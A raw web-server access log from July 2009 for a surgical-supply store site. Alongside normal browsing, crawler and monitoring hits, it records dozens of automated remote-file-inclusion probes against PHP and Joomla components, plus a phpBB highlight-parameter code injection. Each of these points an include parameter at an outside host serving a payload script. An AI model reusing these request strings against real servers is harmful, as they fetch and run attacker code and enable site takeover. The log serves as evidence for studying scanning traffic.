84.207.17.120 - - [12/Jul/2009:04:48:29 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:04:48:29 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
84.207.17.120 - - [12/Jul/2009:04:48:29 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
74.63.91.170 - - [12/Jul/2009:04:49:27 -0400] "GET ///vwar/backup/errors.php?error=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:49:27 -0400] "GET /logs///vwar/backup/errors.php?error=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:49:28 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:49:31 -0400] "GET /logs/access_log.Q109051000%20%20///vwar/backup/errors.php?error=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:04:49:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [12/Jul/2009:04:49:56 -0400] "GET /images/items/0011961_thumb.jpg HTTP/1.1" 200 1117 "-" "Googlebot-Image/1.0"
67.159.63.3 - - [12/Jul/2009:04:50:51 -0400] "GET /logs/access_log.Q109062300/voir.php?inc=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.159.63.3 - - [12/Jul/2009:04:50:59 -0400] "GET /logs/access_log.Q109062300/voir.php?inc=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:51:47 -0400] "GET /logs/access_log.Q109060600%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:51:47 -0400] "GET /logs/access_log.Q109052700%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:51:47 -0400] "GET /logs/access_log.Q109060600%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:04:51:47 -0400] "GET /logs/access_log.Q109052700%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
213.92.85.176 - - [12/Jul/2009:04:52:02 -0400] "GET /logs/error_log.Q109061800//newspublish/include.php?path%5Bdocroot%5D=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
89.253.240.80 - - [12/Jul/2009:04:52:12 -0400] "GET /logs/access_log.Q109062500%20//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
216.120.237.150 - - [12/Jul/2009:04:54:55 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
216.120.237.150 - - [12/Jul/2009:04:54:55 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
216.120.237.150 - - [12/Jul/2009:04:54:55 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
209.59.12.99 - - [12/Jul/2009:04:55:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.63.91.170 - - [12/Jul/2009:04:57:20 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:04:57:22 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
213.92.85.176 - - [12/Jul/2009:04:57:31 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
74.6.17.176 - - [12/Jul/2009:04:58:23 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.251 - - [12/Jul/2009:04:58:28 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.251 - - [12/Jul/2009:04:58:32 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.251 - - [12/Jul/2009:04:58:37 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
74.6.17.176 - - [12/Jul/2009:04:58:24 -0400] "GET /logs/access_log.Q109071100 HTTP/1.0" 200 2250018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.251 - - [12/Jul/2009:04:58:43 -0400] "GET /logs/access_log.Q108091400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
213.92.85.176 - - [12/Jul/2009:04:58:45 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
208.115.111.251 - - [12/Jul/2009:04:58:49 -0400] "GET /logs/access_log.Q108110900 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.251 - - [12/Jul/2009:04:58:53 -0400] "GET /logs/access_log.Q109032200 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.251 - - [12/Jul/2009:04:58:58 -0400] "GET /logs/error_log.Q108100400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
216.120.237.150 - - [12/Jul/2009:04:59:15 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
89.253.240.80 - - [12/Jul/2009:04:59:59 -0400] "GET /logs/access_log.Q109062500//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:59:59 -0400] "GET //spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:59:59 -0400] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
89.253.240.80 - - [12/Jul/2009:04:59:59 -0400] "GET /logs/access_log.Q109060100//spaw/spaw_control.class.php?spaw_root=http://eng.nevskydvor.ru/php/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Jul/2009:05:02:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [12/Jul/2009:05:06:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [12/Jul/2009:05:07:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1193A84E96E3600023D1058+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.128.135.52 - - [12/Jul/2009:05:07:26 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jul/2009:05:08:50 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.135.42.164 - - [12/Jul/2009:05:09:41 -0400] "GET /phphtml.php?htmlclass_path=' HTTP/1.1" 404 209 "-" "libwww-perl/5.816"
216.120.237.150 - - [12/Jul/2009:05:09:46 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
89.108.123.96 - - [12/Jul/2009:05:09:57 -0400] "GET /phphtml.php?htmlclass_path=' HTTP/1.1" 404 209 "-" "libwww-perl/5.825"
66.135.42.164 - - [12/Jul/2009:05:10:28 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=' HTTP/1.1" 404 236 "-" "libwww-perl/5.816"
66.135.42.164 - - [12/Jul/2009:05:10:29 -0400] "GET /phphtml.php?htmlclass_path=' HTTP/1.1" 404 209 "-" "libwww-perl/5.816"
66.135.42.164 - - [12/Jul/2009:05:10:29 -0400] "GET /logs/phphtml.php?htmlclass_path=' HTTP/1.1" 404 214 "-" "libwww-perl/5.816"
89.108.123.96 - - [12/Jul/2009:05:10:56 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=' HTTP/1.1" 404 236 "-" "libwww-perl/5.825"
89.108.123.96 - - [12/Jul/2009:05:10:57 -0400] "GET /phphtml.php?htmlclass_path=' HTTP/1.1" 404 209 "-" "libwww-perl/5.825"
89.108.123.96 - - [12/Jul/2009:05:10:57 -0400] "GET /logs/phphtml.php?htmlclass_path=' HTTP/1.1" 404 214 "-" "libwww-perl/5.825"
66.135.42.164 - - [12/Jul/2009:05:11:30 -0400] "GET /logs/error_log.Q109052300/phphtml.php?htmlclass_path=' HTTP/1.1" 404 235 "-" "libwww-perl/5.816"
209.59.12.99 - - [12/Jul/2009:05:12:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.123.96 - - [12/Jul/2009:05:12:36 -0400] "GET /logs/error_log.Q109052300/phphtml.php?htmlclass_path=' HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
74.63.91.170 - - [12/Jul/2009:05:14:09 -0400] "GET /popup.php?path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:05:14:09 -0400] "GET /logs/access_log.Q109060400%20%20/popup.php?path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:05:14:09 -0400] "GET /logs/popup.php?path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
74.63.91.170 - - [12/Jul/2009:05:14:48 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.120.237.150 - - [12/Jul/2009:05:16:27 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [12/Jul/2009:05:16:27 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [12/Jul/2009:05:16:27 -0400] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
200.80.241.115 - - [12/Jul/2009:05:16:46 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/Jul/2009:05:16:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.80.241.115 - - [12/Jul/2009:05:17:15 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
200.80.241.115 - - [12/Jul/2009:05:17:20 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
200.80.241.115 - - [12/Jul/2009:05:17:26 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
200.80.241.115 - - [12/Jul/2009:05:17:42 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
90.207.42.53 - - [12/Jul/2009:05:18:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:18:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:18:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:18:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.68.70 - - [12/Jul/2009:05:18:43 -0400] "GET /images/items/0100036_thumb.jpg HTTP/1.1" 200 1323 "-" "Googlebot-Image/1.0"
213.92.85.176 - - [12/Jul/2009:05:19:00 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:05:19:01 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:05:19:01 -0400] "GET /logs/access_log.Q109061500//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:05:19:02 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
200.80.241.115 - - [12/Jul/2009:05:19:17 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
90.207.42.53 - - [12/Jul/2009:05:19:33 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE%20CLAMP HTTP/1.1" 200 38020 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:35 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:35 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:35 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:35 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:35 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:35 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:36 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:36 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:36 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:36 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:36 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:36 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:36 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
91.121.89.135 - - [12/Jul/2009:05:19:36 -0400] "GET //config/dbutil.bck.php?confdir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:05:19:36 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:05:19:36 -0400] "GET /logs/access_log.Q109070300//config/dbutil.bck.php?confdir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
90.207.42.53 - - [12/Jul/2009:05:19:38 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
